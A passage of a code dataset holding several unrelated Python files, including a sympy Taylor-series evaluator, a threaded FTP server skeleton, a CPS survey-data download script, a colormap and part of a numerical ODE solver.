TemplateView.as_view(template_name=\"twitter/about.html\")),\n\n)","sub_path":"twitter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357800917","text":"from sympy.polys.lpoly import *\nfrom sympy import *\nfrom sympy.core import C\n\nclass TaylorEvalError(TypeError):\n pass\n\n\ndef ev_args(te,a):\n if len(a) == 1:\n a = a[0]\n if a == te.var:\n return 
te.lvar\n if isinstance(a, Number):\n return te.coerce_number(a)\n return te(a)\n else:\n raise NotImplementedError\n\ndef taylor(p,var=None,start=0,prec=6,dir=\"+\",pol_pars=[],ov=True):\n \"\"\"\n taylor series expansion of p\n kept the same arguments as series, with the addition\n of pol_pars\n var series variable\n start var=start point of expansion\n prec precision of the series\n dir ... \n pol_pars polynomial parameters\n ov = True return always the series in expanded form\n ov = False return a series which must be expanded to be put in canonical\n form; this is faster\n\n ALGORITHM try first to compute the series in the\n QQ ring; if this fails compute it\n in the symbolic ring SR consisting\n of the sympy expressions which do not depend on\n var and pol_pars; if also this fails compute it\n using the series function\n\n EXAMPLES\n\n >>> from sympy import *\n >>> from sympy.polys.ltaylor import taylor\n >>> x,y = symbols('x,y')\n >>> taylor(sin(x*tan(x)),x,0,10)\n x**2 + x**4/3 - x**6/30 - 71*x**8/630 + O(x**10)\n\n >>> taylor(sqrt(1 + x*sin(pi*x)),x,0,6)\n 1 + x**4*(-pi**2/8 - pi**3/12) + pi*x**2/2 + O(x**6)\n\n >>> taylor(exp(x*log(x)),x,0,3)\n 1 + x*log(x) + x**2*log(x)**2/2 + O(x**3*log(x)**3)\n\n In these examples y is first treated internally\n as a Sympy symbol, then as a polynomial parameter;\n the latter version is faster\n\n >>> taylor(atan(x*y + x**2),x,0,5)\n x*y + x**2 - x**4*y**2 - x**3*y**3/3 + O(x**5)\n >>> taylor(atan(x*y + x**2),x,0,5,pol_pars=[y])\n x*y + x**2 - x**4*y**2 - x**3*y**3/3 + O(x**5)\n \"\"\"\n\n if var == None or prec == None or dir != \"+\" or \\\n prec in [S.Infinity, S.NegativeInfinity]:\n return series(p,var,start,prec)\n # case with ov=True; for ov=False taylor is faster than for ov=True\n # tan(x) 100 taylor 50% faster \n # 200 taylor 20% faster\n # 1000 series 3x faster (chosen series for this)\n if prec > 70 and ov:\n head = p.__class__\n if head in [tan,acos,asin]:\n q = p.args[0]\n if q == var:\n return series(p,var,start,prec)\n if q.__class__ == Mul:\n if var in q.args:\n b = 1\n ni = q.args.index(var)\n for i in range(len(q.args)):\n if i != ni and isinstance(q.args[i],Number):\n b = 0\n break\n if b:\n return series(p,var,start,prec)\n if start:\n p0 = p\n p = p.subs(var,var+start)\n gens = [var] + pol_pars\n for ring in [QQ, sympify]:\n te = TaylorEval(gens, ring, prec)\n try:\n p1 = te(p)\n lp = p1.lp\n p1 = p1.tobasic(*gens)\n #args = list(p1._args + (O(var**prec),))\n #p1._args = tuple(args)\n # in the symbolic ring case one must expand\n # because the coefficients are often not expanded\n # TODO expand the coefficients\n if lp.SR:\n p1 = p1.expand()\n if ov:\n p1 = p1 + O(var**prec)\n return p1\n except TaylorEvalError:\n continue\n except NotImplementedError:\n continue\n #print 'DB5 used series',p\n if start:\n p = p0\n p1 = series(p,var,start,prec)\n return p1\n\n\n\nclass TaylorEval:\n def __init__(self,gens,ring,prec):\n \"\"\"gens[0] is the series variable\n\n \"\"\"\n self.prec = prec\n self.gens = gens\n self.var = gens[0]\n self.ngens = len(gens)\n # try first with ring QQ\n self.ring = ring\n self.lp = LPoly(['X%d' % i for i in range(self.ngens)],ring,O_lex)\n self.lvname = 'X0'\n self.lgens = self.lp.gens()\n self.lvar = self.lgens[0]\n self.dgens = dict(zip(self.gens,self.lgens))\n\n def coerce_number(self, a):\n ring = self.ring\n if self.lp.SR:\n return a\n if isinstance(a, Rational):\n if ring == QQ:\n return QQ(a.p,a.q)\n return a\n else:\n raise TaylorEvalError\n\n\n def __call__(self,f):\n if isinstance(f, Number):\n 
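# numeric leaves coerce straight into the coefficient ring (QQ or SR)\n 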
return self.coerce_number(f)\n if f in self.gens:\n return self.dgens[f]\n\n head = f.__class__\n if head == Add:\n s = self.lp(0)\n for x in f.args:\n if self.var in x.atoms():\n x = self(x)\n elif x in self.gens:\n x = self.dgens[x]\n else:\n x = self.coerce_number(x)\n s += x\n return s\n if head == Mul:\n s = self.lp(1)\n for x in f.args:\n if self.var in x.atoms():\n x = self(x)\n s = s.mul_trunc(x,self.lvname,self.prec)\n elif x in self.gens:\n x = self.dgens[x]\n s = s.mul_trunc(x,self.lvname,self.prec)\n else:\n x = self.coerce_number(x)\n s = s*x\n return s\n if head == Pow:\n args = f.args\n pw = args[1]\n x = args[0]\n if self.var in x.atoms():\n x = self(x)\n if pw == int(pw):\n x1 = x.pow_trunc(pw,self.lvname,self.prec)\n else:\n if isinstance(pw, Rational):\n num = int(pw.p)\n den = int(pw.q)\n x1 = x.pow_trunc(num,self.lvname,self.prec)\n x1 = x1.nth_root(den,self.lvname,self.prec)\n else:\n raise NotImplementedError\n return x1\n x = self.coerce_number(x)\n return x\n if head == cos:\n q = ev_args(self,f.args)\n return q.cos(self.lvname,self.prec)\n if head == sin:\n q = ev_args(self,f.args)\n return q.sin(self.lvname,self.prec)\n if head == exp:\n q = ev_args(self,f.args)\n return q.exp(self.lvname,self.prec)\n if head == log:\n q = ev_args(self,f.args)\n return q.log(self.lvname,self.prec)\n if head == atan:\n q = ev_args(self,f.args)\n return q.atan(self.lvname,self.prec)\n if head == tan:\n q = ev_args(self,f.args)\n return q.tan(self.lvname,self.prec)\n if head == cosh:\n q = ev_args(self,f.args)\n return q.cosh(self.lvname,self.prec)\n if head == sinh:\n q = ev_args(self,f.args)\n return q.sinh(self.lvname,self.prec)\n if head == tanh:\n q = ev_args(self,f.args)\n return q.tanh(self.lvname,self.prec)\n if head == atanh:\n q = ev_args(self,f.args)\n return q.atanh(self.lvname,self.prec)\n raise NotImplementedError('case in __call__ not considered f=%s' % f)\n \n","sub_path":"sympy/polys/ltaylor.py","file_name":"ltaylor.py","file_ext":"py","file_size_in_byte":7358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"255896038","text":"# Features\n\"\"\"\n[1] Split into a server and a client; several clients must be able to operate at the same time.\n The server accepts client requests in a loop; clients issue operation commands.\n[2] A client can see which files are in the server's file library.\n Server file library: build a library, query it, return the names of the files it holds, allow file access.\n Client: send a list request, receive all file names.\n[3] A client can download a file from the library to the local machine.\n The client reads the file and writes it into a new local file.\n[4] A client can upload a local file to the library.\n The server reads the file and saves it into a new file.\n[5] Use print on the client to show command prompts that guide the user.\n\"\"\"\n# Design analysis\n\"\"\"\n#1. Key techniques\n #concurrency model: multi-threading\n #data transfer: TCP\n#2. Structure\n #wrap the basic file operations in a class\n#3. Feature modules\n #step 1: build the network communication model\n #list the files\n #download a file\n #upload a file\n #client exit\n#4. Protocol\n # L: request the file list\n # Q: quit\n # G: download a file\n # P: upload a file\n\"\"\"\n\n\"\"\"\nFTP file server, server side\nenv : python3.6\nmulti-process/thread concurrency, socket\n\"\"\"\nfrom socket import *\nfrom threading import Thread\nimport sys,os\nimport time\n\n# Global variables\nHOST = \"0.0.0.0\"\nPORT = 8080\nADDR = (HOST,PORT)\nFTP = \"folder\" # location of the file library\n\n\n# Class implementing the server-side file handling\nclass FTPServer(Thread):\n \"\"\"\n Handle list, download, upload and quit requests\n \"\"\"\n def __init__(self,connfd):\n self.connfd = connfd\n super().__init__()\n\n def do_list(self):\n # fetch the file list\n files = os.listdir(FTP)\n if not files:\n self.connfd.send(\"file library is empty\".encode())\n return\n else:\n self.connfd.send(b'OK')\n time.sleep(0.1)\n # join the filenames\n filelist = \"\"\n for file in files:\n if \".\" in file:\n filelist += file + '\\n'\n self.connfd.send(filelist.encode())\n\n def do_quit(self):\n self.connfd.send(\"exiting\".encode())\n\n def do_get_file(self):\n pass\n def do_put_file(self):\n pass\n\n\n\n # receive requests in a loop and dispatch to the matching handler\n def run(self):\n while True:\n data = self.connfd.recv(1024).decode()\n 
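# one-letter protocol from the client: L=list, G=get/download, P=put/upload, Q=quit\n 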
if not data or data == \"Q\":\n # quit request or client disconnect: stop this worker thread\n if data:\n self.do_quit()\n self.connfd.close()\n break\n if data == \"L\":\n self.do_list()\n if data == \"G\":\n self.do_get_file()\n if data == \"P\":\n self.do_put_file()\n\n\n# build the server-side network model\ndef main():\n # create the listening socket\n s = socket()\n s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n s.bind(ADDR)\n s.listen(5)\n\n print(\"Listening on port 8080...\")\n\n # wait for client connections in a loop\n while True:\n try:\n c, addr = s.accept()\n print(\"Connect from\", addr)\n except KeyboardInterrupt:\n sys.exit('server shutting down')\n except Exception as e:\n print(e)\n continue\n\n # spawn a thread to handle this client\n client = FTPServer(c)\n client.daemon = True\n client.start() # runs run()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"PycharmProjects/python_file/month2/day10/ftp-server.py","file_name":"ftp-server.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"320121161","text":"from typing import List, Dict, Any, Union\nfrom dataclasses import dataclass\n\nfrom base.common.models.request import BaseRequestModelKeys, KwargsRequestModel, DataKeys\n\n\n@dataclass\nclass SetAssetsRequestParams(BaseRequestModelKeys):\n LOAN_NUMBER_ID: str = \"LoanNumberID\"\n\n\n@dataclass\nclass SetAssetsPayload:\n CUSTOMER_ID: str = \"CustomerID\"\n ASSET_ID: str = \"AssetID\"\n FIELDS: str = \"Fields\"\n\n\n@dataclass\nclass SetAssetsFieldNames:\n FIX_DESCRIPTION: str = \"Fix_Description\"\n MARKET_VALUE: str = \"Market_Value\"\n BOTH: str = \"Both\"\n\n\nclass SetAssetsRequest(KwargsRequestModel):\n data_payload = SetAssetsPayload\n REQUEST_PAYLOAD_KEY: str = \"Assets\"\n\n def __init__(self, loan_number_id, payload_dict, session_id, nonce, pretty_print, **kwargs):\n self.loan_number_id = loan_number_id\n super().__init__(session_id=session_id, nonce=nonce, payload=payload_dict, pretty_print=pretty_print, **kwargs)\n\n def to_params(self) -> Dict[str, Any]:\n args = super().to_params()\n args[SetAssetsRequestParams.LOAN_NUMBER_ID] = self.loan_number_id\n return args\n\n def build_payload(self) -> Dict[str, List[Dict[Any, Union[List[Dict[str, Any]], Any]]]]:\n payload_dict = {}\n\n # For all fields create a dual entry dictionary:\n # { FIELD_NAME: attr_name, FIELD_VALUE: attr_value }\n for payload_key in self.attr_list:\n if getattr(self, payload_key.lower(), None) is not None:\n\n if payload_key.title() == SetAssetsPayload.FIELDS:\n fields_list = []\n for key, value in getattr(self, payload_key).items():\n fields_list.append(\n {DataKeys.FIELD_NAME: key,\n DataKeys.FIELD_VALUE: value})\n payload_dict.update({SetAssetsPayload.FIELDS: fields_list})\n continue\n\n payload_dict.update({getattr(self.data_payload, payload_key.upper(), payload_key): getattr(self, payload_key.lower())})\n\n return {self.REQUEST_PAYLOAD_KEY: [payload_dict]}\n\n\nif __name__ == \"__main__\":\n import pprint\n kwargs = {\n \"asset_id\": 12345,\n \"customer_id\": 98765,\n \"fields\": {\n SetAssetsFieldNames.FIX_DESCRIPTION:\"Honda Civic\",\n SetAssetsFieldNames.MARKET_VALUE:1900000\n }\n }\n print(f\"KWARGS: {pprint.pformat(kwargs)}\")\n\n obj = SetAssetsRequest(loan_number_id=10000001, payload_dict=None, session_id=123456, nonce=123245687, pretty_print=False, **kwargs)\n print(f\"\\nPAYLOAD: {pprint.pformat(obj.payload)}\")\n\n print(\"\\nTesting SetAssetsRequest - payload_dict\")\n obj_args = SetAssetsRequest(loan_number_id=986532147, vendor_name=\"test_vendor\", payload_dict=obj.payload,\n pretty_print=False, session_id=123456, nonce=123245687)\n print(f\"PAYLOAD: 
{pprint.pformat(obj_args.payload)}\")","sub_path":"APIs/assets/requests/set_assets.py","file_name":"set_assets.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"534350135","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\npython3 translation of script ot download dta files\nfor cross-platform compatibility\n\"\"\"\n\n# note: check for SSL certificates in OSX python3.6\n\nimport bs4\nfrom urllib.request import urlopen\nfrom urllib.request import urlretrieve\nfrom urllib.error import HTTPError\nimport urllib3\n#from multiprocessing.dummy import Pool # use threads for I/O bound tasks\nimport re\nimport zipfile\nimport os\nimport time\nfrom datetime import datetime\nfrom url2filename import url2filename \nimport subprocess\nimport tarfile\nimport glob\nimport sys\nfrom pandas import DataFrame\n\nif 'darwin' in sys.platform:\n print('Running \\'caffeinate\\' on MacOSX to prevent the system from sleeping')\n subprocess.Popen('caffeinate')\n\nprint(\"getting NBER do-files...\")\n# get dofiles\ndofiles = 'http://www.nber.org/data/cps_basic_progs.html' \nhtml_page = urlopen(dofiles)\nsoup = bs4.BeautifulSoup(html_page, \"html5lib\")\nurls = []\nfor link in soup.findAll('a'):\n match_dct = re.search('9[7-9].dct|[012][0-9]t?.dct', link.get('href'))\n match_do = re.search('9[7-9].do|[012][0-9]t?.do', link.get('href'))\n if match_dct:\n urls.append('http://www.nber.org' + link.get('href'))\n if match_do:\n urls.append('http://www.nber.org' + link.get('href'))\n\ndcts = []; dos = []\nfor url in urls:\n local_filename, headers = urlretrieve(url, url2filename(url))\n if re.search('.dct', local_filename):\n dcts.append(local_filename)\n if re.search('.do', local_filename):\n dos.append(local_filename)\n\nfor dct in dcts:\n with open(dct, 'r') as lines:\n tmp = lines.readline()\n txt = lines.read().splitlines(True)\n txt[0] = re.sub('dictionary using .*.raw', 'infile dictionary', tmp)\n with open(dct, 'w', encoding='latin1') as lines:\n lines.writelines(txt)\n\ntmp_readers = {\n range(201501,201801): 'cpsbjan2015.do', # remem ranges end at month+1 since zero-indexing\n range(201404,201413): 'cpsbapr2014.do',\n range(201401,201404): 'cpsbjan2014.do',\n range(201301,201313): 'cpsbjan13.do',\n range(201205,201213): 'cpsbmay12.do',\n range(201001,201205): 'cpsbjan10.do',\n range(200901,200913): 'cpsbjan09.do',\n range(200701,200813): 'cpsbjan07.do',\n range(200508,200613): 'cpsbaug05.do',\n range(200405,200508): 'cpsbmay04.do',\n range(200301,200405): 'cpsbjan03.do',\n range(199801,200213): 'cpsbjan98.do'}\n\nimport pandas\nimport datetime\nimport calendar\ntable = pandas.read_html('http://www.nber.org/data/cps_basic_progs.html')[1]\ntable[0][1] = table[0][1] + datetime.date.today().strftime('%B %Y')\nfor i in range(12):\n m = list(calendar.month_name)[i+1]\n table[0] = [re.sub(m + ' ([0-9]{4,})', '\\g<1>'+\"{:02d}\".format(i+1), x) for x in table[0]]\n\nfor nums in range(len(table[0])):\n num = re.findall('[0-9]{6,}', table[0][nums])\n #if re.match('.*Revised', table[0][8]):\n # return('do something with revised')\n if len(num) == 2:\n table[0][nums] = range(int(num[0]), int(num[1])+1)\n\ntable = table[1:]\ntmp_readers = dict(zip(table[0].tolist(), table[3].tolist()))\n\nreaders = {}\nfor k, v in tmp_readers.items():\n for key in k:\n readers[key] = v\n\n# get data\nurl = 'http://www.nber.org/data/cps_basic.html'\nhtml_page = urlopen(url)\nsoup = bs4.BeautifulSoup(html_page, \"html5lib\")\nurls = 
[]\nfor link in soup.findAll('a'):\n match = re.search('[0-2][0-9]r?pub.zip', link.get('href'))\n if match:\n urls.append('http://www.nber.org' + link.get('href'))\n match2 = re.search('99r?pub.zip', link.get('href'))\n if match2:\n urls.append('http://www.nber.org' + link.get('href'))\n\n#zipped = [url2filename(url) for url in urls]\n#datfiles = ['cps' + re.search('[a-z]{3,}[0-9]+', z).group(0) + '.dat'\n# for z in zipped]\n#dtafiles = ['cps' + re.search('[a-z]{3,}[0-9]+', z).group(0) + '.dta'\n# for z in zipped]\n#files = list(zip(urls, zipped, datfiles, dtafiles))\n\n# check timestamp if in both places\n#candidates = set(dtafiles) & set(os.listdir())\n#cand = [x for x in files if x[3] in candidates]\n\nprint('checking versions of current files...')\n\nimport calendar\n#dtafiles = list()\n#for y in sorted(list(range(1999,datetime.now().year+1))):\n #if y == datetime.now().year:\n #months = calendar.month_abbr[1:datetime.now().month+1]\n #else:\n #months = calendar.month_abbr[1:13]\n #for x in months:\n #dtafiles.append('cps' + x.lower() + str(y)[2:4] + '.dta') \ndtafiles = ['cps' + re.search('[a-z]{3,}[0-9]+', u).group(0) + '.dta'\n for u in urls]\n \ndatfiles = [re.sub('dta', 'dat', x) for x in dtafiles]\n\n# get server timestamps:\npool = urllib3.HTTPConnectionPool('www.nber.org')\nts = [pool.request('HEAD', url) for url in urls]\n# drop missing dtafiles\nwhile [i.status for i in ts].count(404):\n i = [i.status for i in ts].index(404)\n ts.pop(i); dtafiles.pop(i); datfiles.pop(i); urls.pop(i)\nts = [i.headers['Last-Modified'] for i in ts]\n#ts = [urlopen(url).info()['Last-Modified'] for url in urls]\n\n# convert to POSIX\ntsdt = [datetime.datetime.strptime(i, '%a, %d %b %Y %H:%M:%S %Z') for i in ts]\ntsServer = [time.mktime(i.timetuple()) for i in tsdt] # to POSIX\n\n# get local timestamps\ntsLocal = list()\nfor i in dtafiles:\n try:\n tsLocal.append(os.stat('dta/' + i).st_mtime)\n except FileNotFoundError:\n tsLocal.append(0)\n\nkeys = urls\nvalues = list(zip(datfiles, dtafiles, tsServer, tsLocal))\nfiles = dict(zip(keys, values))\n\ntsdict = dict(zip(['url', 'server.ts', 'local.ts'], (urls, tsServer, tsLocal)))\ntsDF = DataFrame.from_dict(tsdict, dtype = 'int')\ntsDF = tsDF[['url', 'local.ts', 'server.ts']] # reorder\n\n# get urls of those that need to be replaced\ntsDF = tsDF[tsDF['local.ts'] < tsDF['server.ts']]\nprint('we need to download a few files:')\nprint(tsDF)\nurls = tsDF['url'].tolist()\nnewtime = tsDF['server.ts'].tolist()\n\nfiles = {k: files[k] for k in urls} # subset files\n\n# print('note: using Stata installation at /usr/local/stata15/') \n\nwhile urls:\n url = urls.pop(0)\n try:\n zip_path, headers = urlretrieve(url, url2filename(url))\n # this shouldn't be necessary anymore:\n #if url2filename(url) not in set(os.listdir()):\n #print('downloaded ' + url)\n except HTTPError: \n print('could not find ' + url)\n urls.append(url)\n next\n zip_ref = zipfile.ZipFile(zip_path, 'r')\n oldname = zip_ref.namelist().pop()\n newname = 'cps' + re.search('[a-z]{3,}[0-9]+', oldname).group(0) + '.dat'\n out = zip_ref.extractall()\n os.rename(oldname, newname)\n zip_ref.close()\n os.remove(zip_path)\n print('extracted ' + newname)\n datafile = newname\n # find readerid associated with this file\n yrs = range(1995,2040)\n i1 = [str(x)[2:4] for x in yrs].index(datafile[6:8])\n mos = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']\n i2 = mos.index(datafile[3:6]) + 1 # since zero-indexed\n readerid = int(\n str(yrs[i1]) + \"{:02d}\".format(i2))\n # 
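figure out which NBER reader do-file matches this month's data, then\n # 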
get some filenames\n reader = readers[readerid]\n dct = re.sub('do', 'dct', reader)\n dta = re.sub('dat', 'dta', datafile) \n # substitute items in do-file to match our object\n with open(reader, 'r', encoding = \"ISO-8859-1\") as readerlines:\n text = []\n for line in readerlines:\n line = re.sub('(local d.._name )\"(.*)\"', '\\g<1>\\g<2>', line) # drops quotes\n line = re.sub('local dat.*dat', 'local dat_name '+ datafile, line)\n line = re.sub('local dta.*dta', 'local dta_name '+ dta, line)\n line = re.sub('local dct.*dct', 'local dct_name '+ dct, line)\n text.append(line)\n with open(reader, 'w', encoding='latin1') as readerlines:\n readerlines.writelines(text)\n # now you can run /usr/local/stata15/stata or just have stata on path\n subprocess.run(['stata', '-e', 'do', reader])\n os.utime(dta, (time.time(), files[url][2]))\n\n \n\n#def download(url):\n# local_filename, headers = urlretrieve(url, url2filename(url))\n# zipped.append(local_filename)\n# with Pool(3) as p:\n# print(p.map(download, urls))\n# result = Pool(4).map(urlretrieve, urls) # use 4 threads to download files concurrently\n\n\n# the do-files were written with Latin-1 encoding, so they should be read as\n# such, or they can be replaced with unicode encoding, basics of which are:\n# from bs4 import UnicodeDammit\n# dammit = UnicodeDammit(\"Mayag\\xfcez\")\n# print(dammit.unicode_markup)\n \n#for do in dos:\n# text = []\n# with open(do, 'r', encoding = \"ISO-8859-1\") as lines: # not sure why this \n# # encoding works if unicode doesn't\n# for lineno,line_i in enumerate(lines):\n# if re.search(\"#delimit cr\", line_i):\n# delimline = lineno\n# if re.search(\"save.*d\", line_i):\n# saveline = lineno\n# line_i = re.sub('/homes/data/cps-basic/', '', line_i)\n# line_i = re.sub('/homes/data/cps-basic/', '', line_i)\n# text.append(line_i)\n# if saveline < delimline:\n# # add semicolon\n# text[saveline] = re.sub('\\(save.*\\)', '\\1;\\n', text[saveline])\n# else:\n# # remove semicolon if there\n# text[saveline] = re.sub('\\(save.*replace\\);', '\\1\\n', text[saveline])\n# del saveline, delimline\n# with open(do, 'w') as lines:\n# lines.writelines(text)\n\ndatafiles = glob.glob('*dat')\ndtafiles = glob.glob('*dta')\ndatafiles = [re.sub('dat', 'dta', x) for x in datafiles]\ndatafiles = list(set(datafiles) - set(dtafiles))\ndatafiles = [re.sub('dta', 'dat', x) for x in datafiles]\n\n\n# in May 2017, should read 220 files\n\n# calculate dec 2007 reweights\nreweights = 'cpsrwdec07.zip'\nurlretrieve('http://www.nber.org/cps-basic/cpsrwdec07.zip', reweights)\nwith open(reweights, 'rb') as zipf:\n z = zipfile.ZipFile(zipf, 'r')\n z.extractall()\nos.remove(reweights)\nwith open('cpsrwdec07.do', 'r') as reader:\n text = []\n for line in reader:\n line = re.sub('local dat.*dat\"', \n 'local dat_name '+ re.sub('zip', 'dat', reweights), line)\n text.append(line)\nwith open('cpsrwdec07.do', 'w') as reader:\n reader.writelines(text)\n\nsubprocess.run(['stata', '-e', 'do', re.sub('zip', 'do', reweights)])\n\n# now get other revised weights\nos.chdir('new_weights_2000-2002')\nurl = 'https://thedataweb.rm.census.gov/pub/cps/basic/199801-/pubuse2000_2002.tar.zip'\nurlretrieve(url, url2filename(url))\nwith open('pubuse2000_2002.tar.zip', 'rb') as zipf:\n z = zipfile.ZipFile(zipf, 'r')\n z.extractall()\nos.remove('pubuse2000_2002.tar.zip')\ntarf = glob.glob('*tar')[0]\nwith tarfile.TarFile.open(tarf) as tar:\n tar.extractall()\nos.remove(tarf)\ndatafiles = glob.glob('*.dat')\nfor datafile in datafiles:\n os.chmod(datafile, 777)\n\n# TO DO: is the 
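The set-difference step above finds `.dat` files that still lack a converted `.dta` counterpart; an equivalent sketch on filename stems, which avoids the double `re.sub` round trip:

```python
import glob
import os

# Stems present as raw .dat but not yet as converted .dta still need Stata.
dat_stems = {os.path.splitext(f)[0] for f in glob.glob('*.dat')}
dta_stems = {os.path.splitext(f)[0] for f in glob.glob('*.dta')}
pending = sorted(stem + '.dat' for stem in dat_stems - dta_stems)
```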
following really necessary if not doing reweights?\nsubprocess.run(['stata', '-e', 'do', 'init.do'])\n \nfor datafile in datafiles:\n os.remove(datafile)\n\nos.chdir('..')\nsubprocess.run(['stata', '-e', 'do', 'add_weights_monthly.do'])\n\n# clean up\nfor file in glob.glob('*.dat'):\n os.remove(file)\nos.makedirs('dta', exist_ok = True)\nfor file in glob.glob('*.dta'):\n os.rename(file, 'dta/'+file)\nos.makedirs('logs', exist_ok = True)\nfor file in glob.glob('*.log'):\n os.rename(file, 'logs/'+file)\nos.makedirs('dofiles', exist_ok = True)\nfor file in glob.glob('*.do'):\n os.rename(file, 'dofiles/'+file)\nfor file in glob.glob('*.dct'):\n os.rename(file, 'dofiles/'+file)\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"data/get_dta_files.py","file_name":"get_dta_files.py","file_ext":"py","file_size_in_byte":11453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"176988319","text":"\"\"\"\r\nAuraQI module providing various custom colormaps.\r\n\r\nAuthor: Wes Hamlyn\r\nCreated: 19-Dec-2016\r\nLast Mod: 19-Dec-2016\r\n\r\nCopyright 2016 Wes Hamlyn\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n http://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom matplotlib.colors import ListedColormap\r\n\r\n\r\ndef petrel(direction='normal'):\r\n \"\"\"\r\n Returns the equivalent of the colormap named \"Petrel\" in RokDoc.\r\n \"\"\"\r\n \r\n import numpy as np\r\n import matplotlib as mpl\r\n \r\n n1 = 80\r\n r1 = np.linspace(255, 191, n1)\r\n g1 = np.linspace(255, 0, n1)\r\n b1 = np.linspace(0, 0, n1)\r\n \r\n n2 = 20\r\n r2 = np.linspace(191, 97, n2)\r\n g2 = np.linspace(0, 69, n2)\r\n b2 = np.linspace(0, 0, n2)\r\n \r\n n3 = 20\r\n r3 = np.linspace(97, 202, n3)\r\n g3 = np.linspace(69, 202, n3)\r\n b3 = np.linspace(0, 202, n3)\r\n \r\n r4 = np.linspace(202, 77, n3)\r\n g4 = np.linspace(202, 77, n3)\r\n b4 = np.linspace(202, 77, n3)\r\n \r\n r5 = np.linspace(77, 0, n2)\r\n g5 = np.linspace(77, 0, n2)\r\n b5 = np.linspace(77, 191, n2)\r\n \r\n r6 = np.linspace(0, 161, n1)\r\n g6 = np.linspace(0, 255, n1)\r\n b6 = np.linspace(191, 255, n1)\r\n \r\n r = np.hstack([r1, r2, r3, r4, r5, r6])\r\n g = np.hstack([g1, g2, g3, g4, g5, g6])\r\n b = np.hstack([b1, b2, b3, b4, b5, b6])\r\n cmap = np.vstack([r, g, b]).T / 255.0\r\n \r\n if direction == 'reverse':\r\n cmap = np.flipud(cmap)\r\n \r\n return ListedColormap(cmap, name='petrel')\r\n ","sub_path":"auralib/cmaps.py","file_name":"cmaps.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"422196089","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 22 20:36:17 2019\r\n\r\n@author: billy\r\n\"\"\"\r\n\r\n\"\"\" This is a numeric differential equation solver \"\"\"\r\nif __name__ == \"__main__\":\r\n print(\"This is the Numerical Solver program.\")\r\n print(\"To run the programm run Excecution.py\")\r\n\r\n##functions\r\n## functions for numeric diff.eq solving\r\ndef EF(Time,w,dt, F):\r\n ''' 
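`petrel()` above builds its colormap by stacking per-channel `np.linspace` ramps into an N x 3 RGB array. A two-segment miniature of the same construction, with segment endpoints taken from the first two ramps:

```python
import numpy as np
from matplotlib.colors import ListedColormap

n = 64
# Per-channel ramps (yellow -> red -> dark red), stacked into an N x 3 array
# scaled to 0..1, exactly the construction petrel() uses.
r = np.hstack([np.linspace(255, 191, n), np.linspace(191, 97, n)])
g = np.hstack([np.linspace(255, 0, n),   np.linspace(0, 69, n)])
b = np.hstack([np.linspace(0, 0, n),     np.linspace(0, 0, n)])

mini = ListedColormap(np.vstack([r, g, b]).T / 255.0, name='mini_petrel')
```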
Euler forward numerical integration method\r\n w_(n+1)=w_n+dt*f(tn,wn)\r\n \r\n Computational easiest integration method and Analysticly worst\r\n \r\n input is a w matrix consisting of w=[w0,w1,w2,...,wn]\r\n with wi=[u1(i),u2(i),u3(i),...,um(i)]^T\r\n \r\n Returns: wn+1=[u1(n+1),u2(n+1),...,un(n+1)]^T'''\r\n \r\n ans=w[:,:,-1:]+dt*F(Time[-1],w[:,:,-1:]);\r\n return(ans)\r\n\r\ndef TZ(Time,w,dt, F):\r\n ''' Trapezodial numerical integration method\r\n w_(n+1)=w_n+dt*(f(t_n,w_n)+f(tn+dt,w*_(n+1)))/2\r\n with w*_(n+1)=w_n+dt*f(tn,wn)\r\n \r\n Averge on computuational time and averge on analytics\r\n \r\n input is a w matrix consisting of w=[w0,w1,w2,...,wn]\r\n with wi=[u1(i),u2(i),u3(i),...,um(i)]^T\r\n \r\n Returns: wn+1=[u1(n+1),u2(n+1),...,un(n+1)]^T'''\r\n \r\n \r\n \r\n ans= w[:,:,-1:]+dt/2*(F(Time[-1],w[:,:,-1:])+F(Time[-1]+dt,w[:,:,-1:]+dt*F(Time[-1],w[:,:,-1:])));\r\n \r\n return(ans)\r\n \r\ndef RK(Time,w,dt, F):\r\n ''' Runge-Kutta integrtion method\r\n w_(n+1)=w_n+1/6(k1+2k2+2k3+k4)\r\n \r\n with k1=dt*f(tn,wn)\r\n k2=dt*f(tn+dt/2,w_n+k1/2) \r\n k3=dt*f(tn+dt/2,w_n+k2/2)\r\n k4=dt*f(t_n+dt,w_n+k3)\r\n \r\n Computationaly the hardest method but analystically the best.\r\n \r\n input is a w matrix consisting of w=[w0,w1,w2,...,wn]\r\n with wi=[u1(i),u2(i),u3(i),...,um(i)]^T\r\n \r\n Returns: wn+1=[u1(n+1),u2(n+1),...,un(n+1)]^T'''\r\n \r\n k1=dt*F(Time[-1],w[:,:,-1:])\r\n \r\n k2=dt*F(Time[-1]+dt/2,w[:,:,-1:]+k1/2)\r\n \r\n 